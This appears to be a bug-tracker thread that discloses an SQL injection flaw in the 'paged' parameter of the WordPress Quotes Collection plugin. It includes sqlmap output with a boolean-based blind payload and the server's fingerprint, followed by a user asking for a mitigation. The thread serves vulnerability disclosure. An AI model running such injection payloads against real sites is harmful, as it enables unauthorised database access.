The Quotes Collection Plugin has an SQL injection vulnerability

[Banannna69]

There is an SQL injection vulnerability at the 'page' parameter POC：

sqlmap identified the following injection point(s) with a total of 203 HTTP(s) requests:

Parameter: paged (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page=quotes-collection&s=&_wpnonce=6451483bd1&action=make_public&paged=1 AND 8236=8236&bulkcheck[]=1

[16:57:38] [INFO] testing MySQL [16:57:38] [INFO] confirming MySQL [16:57:39] [INFO] the back-end DBMS is MySQL web server operating system: Linux CentOS 8 web application technology: Apache 2.4.37, PHP 7.2.24 back-end DBMS: MySQL >= 5.0.2

[ghost]

I read on the wordpress contributor forum that this project is currently unable to manage this project because of busyness, I am not a proficient programmer, but is there a temporary way so that this vurnerability cannot be utilized? or we have to disable or even delete these plugins until we wait for the code update? thanks.